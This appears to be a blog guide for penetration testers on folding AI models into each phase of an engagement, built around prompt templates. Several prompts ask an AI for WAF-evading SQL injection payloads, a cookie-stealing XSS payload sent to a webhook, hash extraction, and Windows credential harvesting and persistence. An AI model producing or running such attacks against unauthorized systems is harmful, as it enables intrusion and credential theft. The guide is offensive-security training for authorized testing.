Claude just found 500 zero-days in production software. Kali Linux now has a native AI integration. Every security vendor is slapping “AI-powered” on their marketing page.

And you’re sitting there thinking: okay, but where do I actually start?

This guide is for you — the practicing pentester who knows their craft, understands the methodology, but hasn’t figured out how to meaningfully integrate AI into real engagements. We’ll cover the full kill chain, with concrete prompts, real tools, and honest assessments of where AI helps versus where it still fails.

Junior and senior. Both perspectives covered.


First: The Right Mental Model

AI is not an autopilot. It’s not going to pop shells for you while you grab a coffee. At least not reliably — not yet.

What it actually is: a force multiplier for your existing expertise. Every phase of a pentest involves tasks that are either tedious, pattern-matching-heavy, or documentation-intensive. Those are the tasks AI handles well. The adversarial creativity, the “what does this weird behavior actually mean” judgment, the client-specific contextual reasoning — that’s still you.

Think of it like having a very fast, very well-read junior analyst who never gets tired and has read every CVE, write-up, and methodology doc ever published. You still have to direct the work. You still have to validate the output. But you cover significantly more ground.


Phase 1: Recon & Enumeration

Where AI helps most

Recon generates mountains of data. Nmap output, subdomain lists, certificate transparency logs, OSINT dumps. The bottleneck isn’t running the tools — it’s making sense of what they return.

For junior pentesters: AI helps you not miss things. It catches the obscure service running on a weird port, the subdomain naming pattern that suggests a staging environment, the version string that maps to an unpatched CVE. Experience tells seniors what to focus on. AI gives juniors that pattern recognition faster.

For senior pentesters: AI handles the first-pass triage so you can skip straight to the interesting stuff. Feed it your nmap output and let it prioritize before you even look.

Practical prompts that work

Nmap triage:

Analyze this nmap scan output. Identify:
1. Services with known CVEs from the past 12 months
2. Unusual port/service combinations suggesting custom applications
3. Version strings indicating end-of-life or unpatched software
4. Services commonly vulnerable to authentication bypass

Prioritize by exploitability, not CVSS score alone. Flag anything that looks non-standard.

[paste nmap output here]

Subdomain intelligence:

Analyze these subdomains. Identify:
1. Naming patterns suggesting dev, staging, or internal environments
2. Subdomains that appear forgotten or abandoned based on naming conventions
3. Technology hints (jenkins, gitlab, vault, jira, etc.)
4. Anything that breaks the naming pattern — could indicate acquisitions or shadow IT

[paste subdomain list here]

JavaScript analysis: When you’re doing web app testing, AI excels at parsing JS files for hidden endpoints, hardcoded credentials, and API keys — work that manually takes hours.

Analyze this JavaScript file. Find:
1. API endpoints not referenced in the main application
2. Hardcoded credentials, tokens, or API keys
3. Internal hostnames or IP addresses
4. Debug or admin functionality that appears disabled but still present

[paste JS content here]

Real result: A practitioner recently fed minified JS from a financial app to Claude. It found three internal API endpoints manually invisible in the bundle. One had an IDOR returning 50,000 user records.


Phase 2: Vulnerability Analysis & Code Review

This is where AI has the biggest proven impact in 2026 — and where Claude’s zero-day research demonstrated real capability.

Static code review

AI reads code the way a senior researcher does — not just looking for known patterns, but reasoning about logic. It looks at how previous bugs were fixed, identifies similar patterns nearby, and catches second-order issues that scanners miss.

Prompt for targeted code review:

Review this code for security vulnerabilities. Pay particular attention to:
1. SQL injection — including second-order and blind injection paths
2. Authentication/authorization bypass
3. Input validation gaps
4. Logic flaws in business-critical functions
5. Insecure deserialization

For each finding, explain the attack path and what a proof-of-concept would look like.

[paste code here]

For seniors reviewing findings: Don’t just ask “is this vulnerable.” Ask for the exploit chain.

I found what looks like a blind SQLi in this endpoint. Walk me through how you'd extract the admin password hash using time-based techniques, assuming MySQL and a 5-second threshold.

CVE and version analysis

This service banner says [Apache Tomcat 9.0.65]. What are the highest-impact unpatched CVEs for this version? Which ones are reliably exploitable without authentication? Are there any public PoCs?

Phase 3: Exploitation

This is where AI requires the most careful handling — and where the junior/senior divide matters most.

Junior: Use AI for technique research, not execution

If you’re still building your exploitation intuition, AI is excellent for explaining why something works, not just how to run it. Understanding the mechanics makes you a better pentester; copy-pasting exploits makes you a script kiddie with extra steps.

Learning-oriented prompts:

Explain how a time-based blind SQL injection works at the database query level. What's actually happening when the response delays? Why does the boolean logic matter?
I'm working on a buffer overflow in a 32-bit Linux binary with no ASLR. Walk me through the methodology step by step — what do I look for first?

Senior: Use AI for payload generation and WAF evasion

This is where experienced practitioners get the most leverage. Instead of cycling through PayloadsAllTheThings manually, describe your exact constraint and let AI generate targeted options.

WAF bypass:

I'm testing a WAF that's blocking standard SQL injection payloads. The endpoint appears to use MySQL. The WAF blocks: single quotes, UNION SELECT, and common function names like SLEEP(). 

Generate 10 bypass variations using encoding, case manipulation, and comment injection. Explain the evasion technique behind each one.

Custom payload generation:

I need an XSS payload that:
- Bypasses a CSP that allows 'unsafe-inline' but blocks external script sources
- Exfiltrates document.cookie to a webhook I control
- Works in Chrome 121+ without triggering the built-in XSS auditor

Walk me through the options.

Phase 4: The Kali + Claude MCP Setup

This is the most significant practical development in AI-assisted pentesting right now. Kali Linux has introduced native support for Claude via the Model Context Protocol (MCP) — a standard that lets AI models interact directly with tools and environments.

What it actually enables

Instead of: run scan → copy output → paste to Claude → read response → go back to terminal

You get: conversational interface directly to your Kali tools. Tell Claude to run nmap, analyze the output, then run the next logical tool — all in one session.

"Run nmap on ports 80 and 443, check for common web vulnerabilities, then give me a prioritized list of what to look at first."

Claude executes the commands, reads the output, and reasons about what it means — in context, as a chain.

How to set it up

  1. Install Claude Desktop (desktop app, not browser)
  2. Set up the Kali MCP server: pip install kali-mcp (open source, sandboxed)
  3. Connect Claude Desktop to the MCP server via the settings
  4. Run your Kali instance (local VM, cloud, or your existing setup)

The MCP server provides a sandboxed bridge — Claude can run tools but is scoped to what you expose. You maintain control of what the AI can and can’t touch.

Note: This setup is most powerful in a lab or authorized engagement environment. The sandboxing is solid but you should still understand what you’re giving the AI access to.


Phase 5: Post-Exploitation & Lateral Movement

AI’s role in post-exploitation is mostly research and planning. Given the context-sensitivity of live exploitation, autonomous AI action here carries more risk of disruption.

Where it adds value

Living off the land technique lookup:

I have a foothold on a Windows 10 machine as a standard user. No internet access from the target. What are the best LOLBins for:
1. Credential harvesting without dropping Mimikatz
2. Lateral movement using only built-in Windows tools
3. Persistence that survives reboots without registry writes

Active Directory enumeration:

I've run BloodHound and have the JSON output. Analyze this for:
1. The shortest path to Domain Admin
2. Any Kerberoastable accounts with admin rights
3. ACL abuse paths I should prioritize
4. Quick wins that don't require elevated privileges

[paste BloodHound JSON or summary]

Privilege escalation:

I'm on a Linux box as www-data. Here's the output of: id, sudo -l, find / -perm -4000 2>/dev/null, and crontab -l. What are my best privesc paths?

[paste output]

Phase 6: Reporting

This is the unglamorous part of pentesting that AI handles exceptionally well. Report writing is pattern-heavy, time-consuming, and rarely your favorite part of an engagement.

Finding write-up generation:

Write a professional pentest finding for the following vulnerability:

Type: Blind SQL Injection
Location: /api/v2/members/events endpoint
Parameter: filter[created_at]
Impact: Authenticated users can execute arbitrary SQL against the production database
Evidence: [describe what you observed]
Affected system: [client system]

Write it in the format: Description, Risk Rating, Evidence, Remediation. Use clear technical language suitable for a technical audience. CVSS score if applicable.

Executive summary:

I've completed a penetration test with the following findings: [list findings, severities, brief descriptions]. Write an executive summary for a non-technical C-suite audience. Focus on business risk, not technical details. Keep it under 400 words.

Senior note: AI-generated findings still need your review. It’s fast, but you’re responsible for the accuracy. Check every claim before it goes in a deliverable.


The Honest Limits

AI is not good at:

  • Real-time exploitation — it can’t adapt to live target behavior in a loop the way a skilled human can. Not yet.
  • Novel, creative attack chains — it knows what’s documented. The truly novel paths still come from human intuition.
  • Understanding client context — it doesn’t know that this particular application is a legacy system that can’t be patched, or that this user account belongs to the CEO. You have to carry that context.
  • Reliable exploit execution — it generates payloads well. It doesn’t reliably debug why your shellcode isn’t executing in a real environment.
  • Keeping up with cutting-edge research — if the technique was published last week, the model probably doesn’t know it yet.

Where to Start Tomorrow

If you’re a junior pentester:

  1. Start with recon triage. Paste your next nmap output into Claude and compare its analysis to what you would have focused on manually. Learn from the gaps.
  2. Use it for learning, not shortcuts. Ask it to explain every technique it suggests. Build the foundation.
  3. Try the Kali MCP setup in your home lab. It changes how you interact with tools fundamentally.

If you’re a senior pentester:

  1. Integrate AI into your JS analysis and code review phase. This is where the ROI is highest immediately.
  2. Use it to generate and iterate payload variants. Stop manually cycling through payload lists.
  3. Offload report writing. Use AI for first drafts, you for review and accuracy. Cut your report time in half.

The Bottom Line

Claude finding 500 zero-days isn’t a story about AI replacing pentesters. It’s a signal that the practitioners who integrate these tools into their workflow will cover significantly more ground than those who don’t.

The methodology is still yours. The judgment is still yours. The client relationship is still yours.

But the grunt work? The triage, the pattern-matching, the payload iteration, the report drafting? You don’t have to do all of that manually anymore.

Start small. One phase at a time. The compounding effect is real.


Want more guides like this? Follow @RedTeamGuides on X for daily practitioner takes on offensive security.